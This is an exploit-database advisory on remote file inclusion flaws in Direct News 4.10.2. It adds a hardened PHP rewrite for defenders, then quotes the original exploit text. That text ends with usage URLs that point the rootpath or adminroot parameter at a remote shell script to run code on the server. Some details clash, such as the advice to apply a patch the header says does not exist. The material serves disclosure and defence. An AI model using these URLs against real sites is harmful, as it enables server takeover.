Vendor: Direct News
By: mat
CVSS: 7.5 (HIGH)
Vulnerability type: Remote File Include
CWE: Not mentioned
Product Name: Direct News
Affected Version From: Direct News 4.10.2
Affected Version To: Direct News 4.10.2
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned

Direct News 4.10.2 Multiple Remote File Include Vulnerability

The Direct News 4.10.2 script is vulnerable to multiple remote file inclusion (RFI) vulnerabilities. The affected files are 'admin/menu.php', 'admin/media/update_content.php', 'library/class.backup.php', and 'library/lib.menu.php'. Each of them builds an include or require path from the 'rootpath' or 'adminroot' variable, so an attacker who can control either parameter can make the script include an arbitrary remote file. This can lead to remote code execution on the web server and full compromise of the application.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the Direct News script. Additionally, input validation and sanitization should be implemented so that request-controlled values can never reach an include or require statement.
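As an added example (not code from Direct News or from the advisory's author), the following PHP shows the include pattern quoted in the advisory next to a hardened form of the same logic. It assumes the file lives in admin/ with the application root one level up, that the affected deployment had register_globals enabled (which is how a query parameter can populate an otherwise unassigned $rootpath), and the helper name safe_include is the author's own; none of these details are stated on the page.

```php
<?php
// Added example, not Direct News code. Assumptions: this file sits in admin/,
// the application root is its parent directory, and register_globals=On on the
// affected host (the advisory does not state the latter).

// --- Vulnerable pattern, as quoted in the advisory's admin/menu.php excerpt ---
// $rootpath is never assigned in the file. With register_globals=On a request
// such as ?rootpath=http://... assigns it, and with allow_url_include=On the
// include statement fetches and executes whatever that URL returns.
//
//   include_once $rootpath . '/library/lib.menu.php';

// --- Hardened form ---

// 1. Derive the base path from the location of this file, never from request
//    data. __DIR__ is fixed when the script is compiled and cannot be set by
//    the client.
$rootpath = dirname(__DIR__);   // admin/ -> application root (assumption)

// 2. Refuse the request outright if a client-controlled copy of either
//    variable is present. This blocks the injection and produces a log line
//    that operators can alert on.
foreach (['rootpath', 'adminroot'] as $name) {
    if (isset($_GET[$name]) || isset($_POST[$name]) || isset($_COOKIE[$name])) {
        error_log(sprintf('Blocked attempt to set include base "%s" from %s',
            $name, $_SERVER['REMOTE_ADDR'] ?? 'unknown'));
        http_response_code(400);
        exit;
    }
}

// 3. Only include files that resolve to a real path under the application
//    root. realpath() collapses ".." and symlinks and returns false for
//    stream wrappers such as http:// or php://; the prefix check then rejects
//    anything that resolved outside $rootpath.
function safe_include(string $rootpath, string $relative): void
{
    $base = realpath($rootpath);
    $full = realpath($rootpath . '/' . $relative);
    if ($base === false || $full === false
        || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        error_log("Refused include outside application root: $relative");
        http_response_code(500);
        exit;
    }
    include_once $full;
}

safe_include($rootpath, 'library/lib.menu.php');
safe_include($rootpath, 'modules/menu/lib/treemenu.inc.php');

// 4. Defence in depth at the interpreter level (php.ini, not application code):
//    allow_url_include = Off   ; include/require can no longer open URLs
//    register_globals  = Off   ; removed entirely in PHP 5.4; disable on older hosts
```

The same fix applies to the other three files in the advisory: replace `$adminroot . '/inc.php'` and `$rootpath . '/library/class.menuPere.php'` with paths computed from `__DIR__` and routed through the allow-listing helper. The `error_log` lines in steps 2 and 3 are what a defender should watch for; a request that carries `rootpath=` or `adminroot=` against these scripts is by itself a strong indicator of an exploitation attempt.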

Exploit-DB raw data:

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Direct News 4.10.2 Multiple Remote File Include Vulnerability
Script: http://code.google.com/p/directnews/downloads/list
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)

#################################################
#Vuln Code (directnews-4.10-open-20090506/admin/menu.php)
#
#<?...
#include_once $rootpath .'/library/lib.menu.php';
#include_once $rootpath .'/modules/menu/lib/treemenu.inc.php';
#...?>
#################################################
#################################################
#Vuln Code (directnews-4.10-open-20090506/admin/media/update_content.php)
#
#<?...
#require_once $adminroot . '/inc.php';
#require_once './lib.media.php';
#require_once $adminroot . '/verif_identite.php';
#...?>
#################################################
#################################################
#Vuln Code (directnews-4.10-open-20090506/library/class.backup.php)
#
#<?...
#require_once $adminroot .'/inc.php';
#...?>
#################################################
#################################################
#Vuln Code (directnews-4.10-open-20090506/library/lib.menu.php)
#
#<?...
#require_once $rootpath . '/library/class.menuPere.php';
#...?>
#################################################

Usage: http://[target]/[path]/admin/menu_xml.php?rootpath=http://[shellscript]
       http://[target]/[path]/admin/media/update_content.php?adminroot=http://[shellscript]
       http://[target]/[path]/library/class.backup.php?adminroot=http://[shellscript]
       http://[target]/[path]/library/lib.menu.php?rootpath=http://[shellscript]

Greetings: All Hackerz